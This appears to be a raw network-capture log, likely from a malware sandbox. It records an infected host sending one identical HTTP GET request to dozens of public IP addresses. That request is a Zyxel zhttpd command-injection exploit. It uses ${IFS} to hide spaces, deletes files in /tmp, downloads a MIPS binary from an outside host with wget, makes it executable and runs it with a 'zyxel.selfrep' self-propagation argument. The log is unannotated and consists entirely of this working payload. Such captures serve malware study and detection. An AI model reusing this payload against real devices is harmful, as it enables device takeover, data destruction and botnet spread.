                              Mar 31, 2024 08:41:19.723800898 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3377192.168.2.1358768213.232.86.46443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.723839045 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3378192.168.2.1359466172.153.33.109443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.723867893 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3379192.168.2.1333536213.210.40.42443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.723907948 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3380192.168.2.1358382191.20.181.13443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.723958015 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3381192.168.2.1333330191.213.199.90443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.723990917 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3382192.168.2.135192676.44.224.182443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.724028111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3383192.168.2.1336226150.174.254.209443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.724086046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3384192.168.2.134138477.218.17.135443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.724122047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3385192.168.2.13497388.205.209.250443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.724168062 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3386192.168.2.1355732218.28.39.236443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.724235058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3387192.168.2.134386468.90.67.170443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.724284887 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3388192.168.2.134598014.100.12.127443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.724314928 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3389192.168.2.1336640222.173.38.109443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.724364996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3390192.168.2.1337450155.181.158.210443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.724409103 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3391192.168.2.1356448141.188.56.33443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.724446058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3392192.168.2.1358612187.40.158.144443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.724488020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3393192.168.2.1333694142.169.130.195443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.724544048 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3394192.168.2.1334470141.154.118.16443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.724581957 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3395192.168.2.1346096110.193.210.3443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.724632025 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3396192.168.2.1339984110.243.222.199443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.724656105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3397192.168.2.1338154113.78.199.196443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.724711895 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3398192.168.2.1342188198.217.33.130443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.724770069 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3399192.168.2.135644053.243.218.68443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.724795103 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3400192.168.2.135372412.54.57.28443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.724848032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3401192.168.2.1333398123.137.21.176443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.724896908 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3402192.168.2.1336984103.204.27.36443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.724929094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3403192.168.2.133977041.65.235.23443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.724960089 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3404192.168.2.1348038217.80.250.106443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.724988937 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3405192.168.2.134257470.213.23.212443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.725043058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3406192.168.2.134533041.74.150.230443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.725068092 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3407192.168.2.134147065.54.47.230443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.725117922 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3408192.168.2.13379124.78.97.44443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.725148916 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3409192.168.2.1349722181.128.96.8443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.725193977 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3410192.168.2.135534835.150.142.54443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.725227118 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3411192.168.2.133865246.78.92.4443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.725265026 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3412192.168.2.133355062.144.44.94443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.725301027 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3413192.168.2.1338150129.243.176.118443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.725352049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3414192.168.2.134612818.108.255.132443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.725383997 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3415192.168.2.1342622170.211.179.208443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.725423098 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3416192.168.2.1338606194.248.5.4443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.725445032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3417192.168.2.1352360110.85.88.158443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.725486040 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3418192.168.2.1333572155.207.163.204443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.725517035 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3419192.168.2.134114431.214.85.60443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.725580931 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3420192.168.2.1360650186.21.184.175443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.725637913 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3421192.168.2.1345560131.200.85.39443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.725678921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3422192.168.2.1347504180.232.77.62443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.725717068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3423192.168.2.134425496.98.123.34443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.725780010 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3424192.168.2.1351350157.208.123.30443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.725831032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3425192.168.2.1358020194.25.143.118443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.725862026 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3426192.168.2.135216883.107.19.81443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.725887060 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3427192.168.2.1355046108.211.78.90443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.725934029 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3428192.168.2.134220262.21.135.175443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.725975990 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3429192.168.2.134101878.40.196.100443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.726010084 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3430192.168.2.1339508137.175.1.130443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.726048946 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3431192.168.2.1354376147.23.48.63443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.726098061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3432192.168.2.133666887.21.15.72443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.726129055 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3433192.168.2.1333420122.88.55.161443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.726190090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3434192.168.2.135285432.225.54.47443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.726226091 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3435192.168.2.1354336135.130.64.91443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.726279020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3436192.168.2.133907635.169.231.245443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.726326942 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3437192.168.2.1357360108.170.207.149443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.726372004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3438192.168.2.135351065.0.85.51443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.726391077 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3439192.168.2.1336514130.234.176.80443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.726448059 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3440192.168.2.13344462.73.70.153443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.726495028 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3441192.168.2.1358324183.147.179.120443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.726545095 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3442192.168.2.135201097.178.204.48443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.726603031 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3443192.168.2.135000037.102.210.120443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.726650000 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3444192.168.2.1353140186.221.244.72443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.726696968 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3445192.168.2.1340358179.66.58.252443
                              TimestampBytes transferredDirectionData
